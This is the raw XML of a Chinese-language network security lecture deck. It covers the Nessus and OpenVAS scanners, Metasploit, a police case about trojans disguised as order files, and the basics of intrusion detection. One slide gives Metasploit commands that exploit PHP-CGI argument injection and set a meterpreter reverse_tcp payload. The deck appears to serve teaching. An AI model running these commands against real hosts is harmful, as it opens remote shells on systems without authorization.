                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tenable Network Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的机构。在第三版的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>发布之时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>该机构收回了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的版权与程序源代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin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E6B4BAAB-91DF-4978-B330-00C07670FAB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79875" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3057F542-5CB5-4443-ABDF-01B60B564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6300"/>
            <a:ext cx="9144000"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0BD826B-D328-4010-B950-7A310A1C782B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Openvas</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F01E1E-2A1B-473A-858F-E9D30E7727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 y="2060575"/>
            <a:ext cx="8829675"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486D54C-66BB-456F-841D-CC85254274D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Openvas</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83971" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258BB393-E4E4-4A9E-9458-7AC18FC25D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276475"/>
            <a:ext cx="81248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35ACAE5B-47F6-4D2D-A3D2-132E1B8A2132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Openvas</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86019" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB723A1-77AF-4FBA-B5B3-4C8C8086EA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4213" y="2492375"/>
            <a:ext cx="80200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B32AFC04-B0BD-4787-9CB8-E60EBD79F4CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Openvas</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88067" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C11552E3-D4AD-4E58-97EA-64A824B18E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89138"/>
            <a:ext cx="8220075" cy="30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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB04C20D-BCC2-4272-B681-25A3160B4164}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706438" y="2192338"/>
            <a:ext cx="3632200" cy="4175125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>是一个免费的、可下载的框架，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>H.D. Moore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年发布</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>附带数百个已知软件漏洞的专业级漏洞攻击工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C34FFD8-F1F2-4F51-83A5-892D11E841F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第四步：漏洞利用和入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90116" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85FA7572-DD2A-47FD-9001-CC8F56EFD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844675"/>
            <a:ext cx="4870450" cy="487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54A9160-CDBE-456D-92ED-C7AE6E4D4836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵案例二</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C128966F-E665-4F8C-AC4A-696DBE43EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971549" y="1844675"/>
            <a:ext cx="7972425" cy="4752677"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>黑龙江大庆公安机关侦破张某等人非法控制计算机信息系统案。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月以来，犯罪嫌疑人张某雇佣黑客编写“木马”病毒，组织“投毒手”在互联网电商平台寻找并添加特定行业商户客服微信，以下单、询价等理由，发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪装成订单明细、采购计划的“木马”病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，诱骗受害人点击后实施非法控制，进而实施精准诈骗等犯罪活动。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月，黑龙江大庆公安机关抓获张某以及黑客、“投毒手”共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>人，查明被控电脑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>余台。公安部网安局在本案基础上部署全国网安部门开展集群打击，共打掉黑客等犯罪团伙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>余个，抓获犯罪嫌疑人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>270</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>余人。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="456854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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5672A385-0523-42C0-83BC-839B3FCA6294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第四步：漏洞利用和入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF61304-B13D-4532-80C3-0F2063942541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1182688" y="2017713"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>use exploit/multi/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>php_cgi_arg_injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>set RHOST vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>（被攻击目标的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>地址）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>set RPORT 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>set LHOST </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0"/>
              <a:t>exploit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B96E6E47-6365-4968-B094-860A4E8B01DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第四步：漏洞利用和入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92163" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28E55DA-D5A0-4FBE-91EE-019CA57627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0113" y="2060575"/>
            <a:ext cx="7632700" cy="405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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BBD7794-51F1-48FA-A4E2-CC1E855120DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="1841500"/>
            <a:ext cx="693420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入侵方法</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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   入侵检测概述</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入侵检测方法与基本原理</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入侵检测响应机制</a:t>
            </a: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入侵检测标准化工作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   口令管理</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AEED2EB-16EC-4A65-99C0-88E1D82B207A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2209800"/>
            <a:ext cx="792480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a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-3429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pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>传统的信息安全方法采用严格的访问控制和数据加密策略来防护，但在复杂系统中，这些策略是不充分的。它们是系统安全不可缺的部分但不能完全保证系统的安全</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>入侵检测（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Intrusion Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>）是对入侵行为的发觉。它通过从计算机网络或计算机系统的关键点收集信息并进行分析，从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D953E3-FADF-410B-91E9-B41E2FAE1158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>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000">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intrusion Detection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35FD38EC-7E13-4824-BC2E-ED5BA0077983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的定义</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95235" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB632B4-A604-4DAB-8DA8-EEA1BE896E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对系统的运行状态进行监视，发现各种攻击企图、攻击行为或者攻击结果，以保证系统资源的机密性、完整性和可用性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>进行入侵检测的软件与硬件的组合便是入侵检测系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
